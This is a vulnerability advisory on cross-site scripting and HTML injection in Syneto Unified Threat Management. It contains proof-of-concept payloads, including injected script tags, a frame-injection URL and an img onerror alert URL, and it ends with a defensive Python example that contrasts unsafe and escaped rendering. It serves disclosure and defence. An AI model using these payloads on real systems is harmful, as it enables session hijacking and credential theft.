Exploit Code
source: http://www.securityfocus.com/bid/51597/info

Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected.

Proof of Concept:
=================
The vulnerabilities can be exploited by privileged user accounts, low-privileged viewers, or remote attackers with required user interaction. For demonstration or to reproduce ...

1.1.1
[+] Reports - Executive Summary - Output Listing Category

<tr id="list_1" class="tableRowEven">
  <td class="status" valign="top" align="center">
    <a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif" title="disable" alt="disable" class="disable"></a>
    <a style="display: none;" href="#" title="Enable the reporting list" class="enableList"><img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a>
  </td>
  <td valign="top">"><EXECUTION OF PERSISTENT SCRIPT CODE!>'</td>
  <td valign="top" nowrap="nowrap">
    <a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit" /></a>
    <a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList"><img src="img/delete.gif" title="Delete" alt="Delete" /></a>
  </td>
</tr>
</tbody>
</table>
</div>

Reference(s):
https://www.example.com.com/syneto.php?menuid=307

1.1.2
[+] EMail - Filter Add & Configure

<div>Sender = >"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div>
<div>Receiver = .*</div>
<div>Subject = .*(SPAM|VIAGRA).*</div>

Reference(s):
https://www.example.com.com/syneto.php?menuid=63

1.1.3
[+] EMail Settings - New Domain

"> <table class="data" id="smtpDomainsList">
<thead>
  <tr>
    <th class="status">Status</th>
    <th class="domain">Domain</th>
    <th class="routing">Routing</th>
    <th class="verify_sender">Verify sender</th>
    <th class="qdm">Send digest</th>
    <th class="actions">Actions</th>
  </tr>
</thead>
<tbody>
  <tr id="domain_3" class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPT CODE!>
    <td class="status">
      <input name="active" value="1" type="hidden">
      <input name="qdm_enabled" value="" type="hidden">
      <input name="qdm_hours" value="23" type="hidden">
      <input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPT CODE!</script>" type="hidden">
      <input name="verify_peer" value="" type="hidden">
      <input name="prefix_digest_links" value="" type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" />
      <input name="verify_sender" value="" type="hidden">
      <input name="verify_sender_network_name" value="" type="hidden">
      <input name="qdm_exceptions" value="" type="hidden">
      <input name="whitelist" value="" type="hidden">
      <input name="blacklist" value="" type="hidden">
      <img class="clickable tooltip" title="" src="img/enabled.gif">
    </td>
    <td class="domain">"><script>alert(vulnerabilitylab)</script></td>

Reference(s):
https://www.example.com.com/syneto.php?menuid=60

1.2
PoC:
https://www.example.com.com/index.php?error=need_login"'><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E

Reference(s):
https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
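As an added defender-side example (not code from the advisory or from Syneto), the smtpDomainsList row from 1.1.3 is rendered the way the defect arises, beside a hardened version that escapes each user-controlled value for the attribute or text context it lands in; the row layout, function names and the sample value are assumptions, and the final check parses the output to confirm that no element beyond the template's own was created.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the break-out string the advisory shows in the
# "domain" cell, reused here for the hidden admin_email attribute as well.
SAMPLE_INJECTED = '"><script>alert(vulnerabilitylab)</script>'

def render_domain_row_unsafe(domain_id: int, domain: str, admin_email: str) -> str:
    """Mirrors the defect: user-controlled values are concatenated straight into
    a double-quoted attribute (admin_email) and a text node (domain)."""
    return (
        f'<tr id="domain_{domain_id}" class="tableRowEven editableDomain">'
        f'<td class="status"><input name="admin_email" value="{admin_email}" type="hidden"></td>'
        f'<td class="domain">{domain}</td></tr>'
    )

def esc(value: str) -> str:
    """Escape &, <, >, " and ' so a value is inert both in HTML text and inside
    a quoted attribute (the two contexts the smtpDomainsList row uses)."""
    return html.escape(value, quote=True)

def render_domain_row_safe(domain_id: int, domain: str, admin_email: str) -> str:
    """Hardened form of the same row: every user-controlled value is escaped at
    output time, and the id is coerced to int so it cannot carry markup."""
    return (
        f'<tr id="domain_{int(domain_id)}" class="tableRowEven editableDomain">'
        f'<td class="status"><input name="admin_email" value="{esc(admin_email)}" type="hidden"></td>'
        f'<td class="domain">{esc(domain)}</td></tr>'
    )

class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would create from the fragment."""
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)

def start_tags(fragment: str) -> list:
    """Regression check for the template: the elements in a rendered row must be
    exactly the template's own (tr, td, input, td); any extra tag came from input."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags
```

html.escape covers only the text and quoted-attribute contexts shown in the advisory; a value placed in an unquoted attribute, a URL, or inline JavaScript needs the encoder for that context instead.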